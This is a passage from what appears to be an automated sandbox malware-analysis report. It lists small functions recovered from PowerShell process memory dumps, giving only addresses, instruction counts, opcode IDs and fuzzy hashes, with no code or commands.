                                                        • Instruction ID: 61df5d7e40b11c030a50f66b69dc1ef8a32f01bbb4464f745085a8cb221222d5
                                                        • Opcode Fuzzy Hash: 6ae96ea927d66baf6c99b8d2be7a776c73976e9da97ecaf853fa7f9f175287ca
                                                        • Instruction Fuzzy Hash: 0D01F7714043449ADF204A66CC887A7BBC8EF41324F189559ED162B282D7799D45C6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 08124A50, Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22c2f843cd3e38c92b4a70446d38f6fe5fe8f8a47f90633a20ab9f9fa47c8d06
                                                        • Instruction ID: 3bd05cd03db5842d47a2e69f7ba7475717d88ba39c8d11418cee838423a72ca6
                                                        • Opcode Fuzzy Hash: 22c2f843cd3e38c92b4a70446d38f6fe5fe8f8a47f90633a20ab9f9fa47c8d06
                                                        • Instruction Fuzzy Hash: FC01F730B01264ABD7148B98DC01BBF7F75EF85701F248079F5046B2C2CB745905C7A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812BBA8, Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cee1610f8d6ae4fc0938e23f46977e525d12326577422cc276dfd708c458e79b
                                                        • Instruction ID: 4d06e9ba8c66bd6638c29bcef6f68309b04b53306ff809c0cbe3654877a17364
                                                        • Opcode Fuzzy Hash: cee1610f8d6ae4fc0938e23f46977e525d12326577422cc276dfd708c458e79b
                                                        • Instruction Fuzzy Hash: 68018C71204619EFC710DF29E4849AAB7F9FF84325B008929E819C7650DB70FD55CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A30D10, Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 267c0adde5bb8b0f2e2d48449632d64d4f7311b69d33fd6e35a4d72c98ff4ccc
                                                        • Instruction ID: 5142d3514f2c5207c82c8e2f2474eacc82113e6ca24f7086c94180eed122c817
                                                        • Opcode Fuzzy Hash: 267c0adde5bb8b0f2e2d48449632d64d4f7311b69d33fd6e35a4d72c98ff4ccc
                                                        • Instruction Fuzzy Hash: D401B1B0A053A99AEB15DFA4C4057EFBBF76F85708F140469E04177681CBB9A904C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A32BC0, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d52dfc690644662f03a78a4bdc39cd1b27c317e67ffba40f7488d3c36b17d38
                                                        • Instruction ID: df6d0d2f953dfe46fffd1140e782211da0429530497f03eb276426cc143fc06b
                                                        • Opcode Fuzzy Hash: 9d52dfc690644662f03a78a4bdc39cd1b27c317e67ffba40f7488d3c36b17d38
                                                        • Instruction Fuzzy Hash: BBF05E352097408FD3299B35E854463BBB6FFC6211329C5BDE49A8B3A5CA39D842CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A36473, Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9538f801d9c91a0362dee71fa6a1436830b38ee82488d0fb4b66dd175065615
                                                        • Instruction ID: bfc5dc64a9329d76ab01e0dd33c91985dc9537b569cfdb1efdef6feee3af4898
                                                        • Opcode Fuzzy Hash: b9538f801d9c91a0362dee71fa6a1436830b38ee82488d0fb4b66dd175065615
                                                        • Instruction Fuzzy Hash: B2F01CB2A10208EFEF62CF84DD40BE97B71FB49350F4440A6F61596160DB769AA0DF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812DAA8, Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c6784105b90b08d42a70cbba0d229a931213b047e8247a6e47d512cf70c54d4
                                                        • Instruction ID: a1ed6a268ff45f2cccc540121767203228db1fa822564128754401533c6b8028
                                                        • Opcode Fuzzy Hash: 7c6784105b90b08d42a70cbba0d229a931213b047e8247a6e47d512cf70c54d4
                                                        • Instruction Fuzzy Hash: B6E026323004248FC3148A4AF400A6673A9EFC4B15B0400BAD40587B24CB60FC1283F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3CE38, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b15a4814414906171609a1a3a9d6def42e187d3e7e2c50c66cb7fb42cc00863
                                                        • Instruction ID: 53bbe5d71cd589adad9886075dbed949a071424fdc11dfe41903d1ccddb3e09c
                                                        • Opcode Fuzzy Hash: 5b15a4814414906171609a1a3a9d6def42e187d3e7e2c50c66cb7fb42cc00863
                                                        • Instruction Fuzzy Hash: B5E0E22140E3C25FC3038B304C64896BFB1EE9730070A84EBE0D0CA0ABC2394828DB22
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812DA78, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c34f8456f537f0cf1772c875a95c3e0708150f00664cee50c4b16e7cbbef5654
                                                        • Instruction ID: b0b352eda7c981e08100eef70ecc48985dfc4b47d57c8f50fbedaaf6fe588729
                                                        • Opcode Fuzzy Hash: c34f8456f537f0cf1772c875a95c3e0708150f00664cee50c4b16e7cbbef5654
                                                        • Instruction Fuzzy Hash: 35C012313100344BC604965CE44499937DDDB89729B4100B6E509CB761CA92EC4147E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 08124AD1, Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa80c569ff41cdde96200bca499ac58b5b10cb0febedf50ee6e3772b9219e2cc
                                                        • Instruction ID: 9588d80295e134b01de9487e3431b34a7d07fb0b3da91c5481494c051f4d10a2
                                                        • Opcode Fuzzy Hash: aa80c569ff41cdde96200bca499ac58b5b10cb0febedf50ee6e3772b9219e2cc
                                                        • Instruction Fuzzy Hash: 3BD0927460A2C28FCB02CB64D554400FFA2BA5639232AC3D6D485CB257C6249856CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 08121978, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4f6bc92c81fca3e9f8210500505c20ce3b80c9f844432021e8f7edc34565437
                                                        • Instruction ID: c12c652112d6a451ab5d798909f4a59d8234322c5331aaf0f5b05f60aeb538a2
                                                        • Opcode Fuzzy Hash: f4f6bc92c81fca3e9f8210500505c20ce3b80c9f844432021e8f7edc34565437
                                                        • Instruction Fuzzy Hash: 0CC08C3AF010098FCB00CB94F8848DCF776FBC8325B00C062E10183101C7319021DB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions